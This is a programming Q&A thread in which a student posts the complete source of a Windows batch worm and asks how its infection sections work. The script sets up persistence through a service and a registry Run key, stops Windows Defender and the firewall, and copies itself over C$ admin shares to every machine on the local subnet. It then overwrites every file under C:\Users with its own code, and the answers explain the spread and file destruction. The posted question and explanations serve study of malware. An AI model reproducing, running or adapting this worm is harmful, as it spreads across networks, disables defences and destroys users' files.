# How this "batch worm" works?

Tags: batch-file, malware

```
@echo off
SET i=0
SET "NomeProcesso=DaMonki.exe"
SET "NomeService=DaMonki"

rem <=== run as service ===>
echo sc create %NomeService% binpath=%0 > service.bat
echo sc start %NomeService% >> service.bat
attrib +h +r +s service.bat
start service.bat
rem <=== startup registry ===>
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
attrib +h +r +s %0
rem <=== kill firewall and windows defender ===>
net stop "Windows Defender Service"
net stop "Windows Firewall"
rem <=== INFECT NETWORK!!! ===>
:Worm
net use Z: \\192.168.1.%i%\C$
if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
mountvol Z: /d)
if %i% == 256 (goto Infect) else (set /a i=i+1)
goto Worm
rem <=== infect *.* in C:\Users ===>
:Infect
for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.bat)
for /f %%f in ('dir C:\Users\*.bat /s /b') do (copy %0 %%f)
```

I am studying about malwares and malicious programs for my TCC and I found this batch worm sample, I can understand most of the code, but I can't understand the `"Infect Network"` and `"Infect *.* in C:\Users"` lines.

What these lines do to my computer? It will simply "infect" the files or will ruin them? This worm will spread just in the victim network? What limits have this code? How can a antivirus stop it?

If you have some good malware/software engineering ebooks and papers, please, leave the links in the comments.

*Sorry for bad speech, i'm not fluently in this language.*

***Don't use this code whith malicious intention!***

Comment: the batch adds itself to your registry so it's fired up when the system boots, and stuffs itself into every user's start menu so it runs when THEY log in, and then tries to do the same to every machine in the local network.

Answer (score 3, accepted):

The "Infect Network" section attempts to get a net use connection to local network IP addresses, reads through a list of the Users in the system and copies a file into their local Startup directory so that it runs when they log in to their machines.

The infect users section is renaming several files in the Users directory to .bat extension, then copies another file in as that name. This means that several files are being forced to have the content of a desired .bat file. Which probably runs some other malicious code or runs the executable that was copied earlier.

Let me know if you need any further clarification.

Comment: It solved my doubt, but, the files that are forced to have the bat content, just don't work anymore? They are now a "new program" ?

Comment: Yes. They won't work anymore. They are renamed to .bat extension. Then, a new batch file is copied into the contents of each, replacing their original intent with the insidious new content. Not sure why it needs two steps to do that, but that's what it seems to be doing.

Comment: You're welcome :)

The code is essentially installing a phony service, disabling Windows security checks and copying various executables and batch files, where possible, to push the worm's content as far as it can across the network.

Comment: Sorry to bother you again! I know it's annoying but I don't want to create a new question about the same code, so if you don't mind: Is there any way to do it without causing any prejudice to the computer? How? And it will infect just the `Users` directory or subfolders too?

Comment: Do you mean, "is there any way to disable the batch file's harmful parts?"? If so, then yes. Just prefix any of the harmful lines with "REM " or "::" to comment them out. If it has already ran though, then you'll have to check the normal online channels for a corrective solution for this particular worm.

Answer (score 0):

The *.* means to infect all in the C:\users profile

Answer (score 0):

By the way, with the set command (SET Process=DaMonki) you can change "DaMonki" to anything else.